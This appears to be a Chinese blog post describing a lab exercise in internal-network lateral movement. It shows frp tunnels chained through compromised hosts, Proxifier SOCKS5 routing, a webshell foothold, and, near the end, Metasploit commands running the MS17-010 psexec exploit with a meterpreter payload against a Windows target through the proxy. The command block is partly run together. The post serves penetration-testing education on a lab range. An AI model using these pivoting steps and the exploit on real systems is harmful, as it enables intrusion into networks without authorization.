当前位置: 首页 > news >正文

内网横向靶场——记录一次横向渗透(二)

昨天给大家带来了一篇通过MSF框架进行横向操作的记录;而今天我想通过同样的靶场,不同的方法继续来给大家展示横向操作。

文章目录

    • 免责声明
      • 靶场演示免责声明
      • 核心使用规范
      • 免责说明
    • 靶场简介
      • 内网结构
    • 第一层代理:VPS—>192.168.22.11主机
      • 服务端操作
      • 客户端操作
      • 图片概括
    • 第二层代理:VPS—>192.168.22.22主机
      • Windows方法
      • 设置代理
      • 攻击步骤
      • 具体流量走向如下图:
    • 访问33网段的主机:
      • 攻击步骤:
      • 图片概括:
    • 总结


免责声明

靶场演示免责声明

本靶场演示环境仅为网络安全技术学习、研究及技能实践专用,旨在提升使用者的网络安全认知与技术应用能力。

核心使用规范

  1. 使用者承诺仅在本靶场授权范围内进行操作,不得利用靶场环境及相关技术攻击、入侵、破坏任何第三方的计算机系统、网络设备或数据资源。
  2. 严禁将靶场所学技术用于违反《网络安全法》《刑法》等法律法规的非法活动,不得侵犯他人合法的网络权益与数据隐私。
  3. 所有操作均需在合法合规、获得明确授权的前提下进行,使用者独立对自身操作行为及可能产生的后果承担全部责任。

免责说明

  1. 靶场搭建方、维护方仅提供学习演示环境,不参与、不指导任何非法操作,对使用者超出授权范围的违规行为及衍生后果不承担任何法律责任。
  2. 因使用者违规使用靶场技术或环境导致的法律纠纷、经济损失、行政处罚等一切后果,均由使用者自行承担,与靶场相关方无关。
  3. 本声明自使用者访问或使用靶场环境之日起生效,如有未尽事宜,均依据国家相关法律法规执行。

本篇文章请大家以网络安全技术学习为目的观看,仅用于知识研究与技能实践,严禁将相关内容用于任何违法违规活动,所有操作需在合法授权范围内进行,使用者自行承担违规后果。


靶场简介

内网结构

本次实验靶场采用多层级内网渗透模型,典型配置包含三个递进式靶机(Target1、Target2、Target3),通过虚拟网络隔离形成企业级内网架构

  • 基础层(Target1-Centos7)
    • 部署 Web 服务(如 ThinkPHP 框架),开放 80、22 等常见端口,存在Web 漏洞。
    • 两个网卡:(用于连接内外网,充当中间服务器的作用)连接外网,作为渗透入口,需通过漏洞获取初始权限。
    • 外网网段,如 192.168.44.0/24;内网网段:192.168.22.0/24
  • 中间层(Target2-Ubuntu)
    • 位于内网(VMnet2 网段,如 192.168.22.0/24),需通过 Target1 作为跳板机横向移动。
      可能存在权限提升漏洞(如 CVE-2021-4034)或服务弱口令,需进一步渗透。
    • 外网机器(44网段的主机)无法直接访问到这台机器;
  • 核心层(Target3-Windows)
    • 处于更深层内网(VMnet3 网段,如 192.168.33.0/24),通常为 Windows 系统,开放 445 端口,可利用永恒之蓝(MS17-010)等漏洞攻击。

具体结构显示:
在这里插入图片描述

信息收集部分这里就不赘述了,主要是讲解不同工具的使用以及思路;详细请看这篇文章:内网横向靶场—记录一次横向操作(手把手详细思路教学)

好了话不多说,我们直接开始;

第一层代理:VPS—>192.168.22.11主机

所需工具:

  • 一台VPS(阿里云,腾讯云,京东云等,随便买一台即可)
    • 如果没有VPS,也可以用kali代替,没关系的
  • frp内网横向工具
    • 包含frpc(客户端),frps(服务端)
  • 蚁剑

好了,就这么多工具;


在我们经过一系列信息收集后,我们获取到了192.168.22.11(看上图,连接内外网的机器)这台主机的shell,并且成功用蚁剑进行了连接:

创建一个新目录tools:
在这里插入图片描述

上传frp文件到192.168.22.11的机器上,解压:

tar -zxvf frp_amd64.tar.gz

在这里插入图片描述

服务端操作

首先在我们的VPS上运行frps服务端
由于是服务端,所以只需要监听自己的7000端口即可;

在这里插入图片描述

(我们再启动一个窗口查询端口是否启动成功,处于监听状态)

在这里插入图片描述
成功!

客户端需要在目标192.168.22.11启动
第一层目标的权限——>进攻第二层192.168.22.22——> 但是第二层是内网地址
目的:第一层机器作为中间人去转发我的流量,我利用他的流量去访问内网的第二台机器;

客户端操作

到192.168.22.11主机上,配置frpc客户端文件,然后运行:

在这里插入图片描述

此时的原理

通过7000端口与VPS建立连接,然后VPS通过10088端口——>Target1转发流量——>访问到内网11机器

运行fprc客户端:

在这里插入图片描述

可以看到VPS的frps服务端也有了反应:

在这里插入图片描述

图片概括

在这里插入图片描述
具体的关系如上图;

第二层代理:VPS—>192.168.22.22主机

如果想看Linux如何进行横向操作的,可以看昨天的文章,这里不再赘述;

我们在经过刚才192.168.22.11主机的网段扫描后,发现22主机开放了80端口(Web服务),于是我们想在Windows上去进行访问;

Windows方法

这里我们和昨天的方法不一样,这里我们使用proxifier代理工具,:

设置代理

首先添加代理服务器

在这里插入图片描述

然后填上你的VPS地址(kali地址),选择socks5代理:

在这里插入图片描述

问题:怎么让我们想访问内网的流量走这个代理?

设置一条代理规则即可:

在这里插入图片描述

注意:这里如果使用VPS的话,你的防火墙10088端口记得打开,否则会失败,无法连接!!!
在这里插入图片描述

然后使用浏览器访问:火狐或者edge都行(配置代理插件)

在这里插入图片描述

再去访问网址,就能够访问到内网22机器了:
(正常访问我们是访问不了的,挂了代理才行)

在这里插入图片描述

而此时proxifier也走10088端口的流量:

在这里插入图片描述

攻击步骤

然后查看一下页面源代码,发现了注入点:

在这里插入图片描述

经过一系列步骤(具体查看上一篇文章),也是成功通过上次Webshell,蚁剑连接成功:

在这里插入图片描述

具体流量走向如下图:

  • 一般情况下:
    在这里插入图片描述

  • 挂了frp代理后:
    在这里插入图片描述

至此,我们的第一层代理已经成功结束;


访问33网段的主机:

现在我们要开始尝试访问到33网段的主机;
同理,我们还是通过frp来搭建代理:

在这里插入图片描述
(要挂着proxifier上传,因为这个22机器是内网机器,我为了上传速度快点,没注意到)

# 同样的压缩步骤
tar -zxvf frp_0.46.0_linux_amd64.tar.gz

攻击步骤:

接下来开始我们的攻击步骤:在22网段的主机(Target2)上:
在这里插入图片描述

注意与第一层客户端代理的区别:看看多了什么,改变了什么?

# 在192.168.22.11机器上,执行frps服务端:
./frps -c frps.ini# 在192.168.22.22机器上,执行frpc客户端:
chmod +x frpc.ini
./frpc -c frpc.ini

理清一下思路:我们在target2上开启了第二层代理,通过frpc将自身的流量转发到了192.168.22.11:10089端口,
但是虽然说有了192.168.22.11:10089这个代理,但是我们Windows机器上还是访问不到;
所以说就需要再把192.168.22.11:10089这个代理的流量,转发到VPS的10090端口上

注意,此时我们的VPS上并没有开启10090端口:

在这里插入图片描述

所以我们在192.168.22.11机器上再去运行frpc.ini文件:

在这里插入图片描述
此时就多出来了;

然后在proxifier上再添加新的服务器规则

在这里插入图片描述

在这里插入图片描述

这个时候再去攻击Target3服务器;

然后打开kali:输入以下命令
msfconsole -quse exploit/windows/smb/ms17_010_psexec 
set payload windows/meterpreter/bind_tcpset proxies socks5:VPS地址:10090
set proxies socks5:VPS地址:10090
set rhosts 192.168.33.33 exploit –j

至此,就可以扫描33网段的Windows主机,进行攻击了;

图片概括:

第二次代理,具体操作如下:

在这里插入图片描述

总结

没什么好总结的,多看多练;期待下次再见!

http://www.dtcms.com/a/592914.html

相关文章:

  • Mysql作业四
  • 枣庄住房和城乡建设厅网站教育网站制作开发
  • 万象EXCEL应用(十六)便利店进销存毛利 ——东方仙盟炼气期
  • 单片机和C语言中的一些通用知识:(二)大端和小端
  • 【疑难解答】MySQL 报错 Public Key Retrieval is not allowed
  • 个人做AI产品,难点在哪里?
  • Electron 应用中的系统检测方案对比与鸿蒙适配实践
  • Apriel-1.5-15b-Thinker 中间训练新突破
  • 景安网站商城网站建设费用
  • 《MySQL数据库进阶(九):数据库备份与恢复(二)》
  • 进程 端口排查速查手册
  • 《中医基础理论》- 2.哲学基础之藏象学说
  • 【Java 开发日记】我们来说一下 Mybatis 的缓存机制
  • 做直播导航网站好西安网站搭建的公司
  • 简要概括自建网站的优缺点网站的标题怎么做吸引人
  • ⸢ 拾肆-Ⅰ⸥⤳ 实战检验应用实践(上):制定规范 开展演练
  • web网页开发,在线物流管理系统,基于Idea,html,css,jQuery,jsp,java,SSM,mysql
  • 企业级混合存储架构:MySQL + MinIO 混合存储实践
  • Android 底部导航栏 (BottomNavigationView) 制作教程
  • 当“老龄化”撞上“数字化”:金融业的“续命解药”还是“增长新图”?银行保险AI人工智能数字化营销销售培训老师培训讲师
  • ArrayList与LinkedList的比较
  • 魏公村网站建设建设部网站电话
  • MySQL索引篇 -- 从数据页的角度看B+树
  • 使用 Newtonsoft.Json(Json.NET)库将对象导出为格式化的 JSON 文件
  • 林州市网站建设给个网站好人有好报
  • 使用前端框架vue做一个小游戏
  • 【操作系统原理】进程优先级与命令行参数、环境变量详解
  • 【深度学习新浪潮】扩散模型中,VAE潜空间正则化如何为生成带来帮助?
  • 从零学习Node.js框架Koa 【四】Koa 与数据库(MySQL)连接,实现CRUD操作
  • Zotero在代理模式下无法同步问题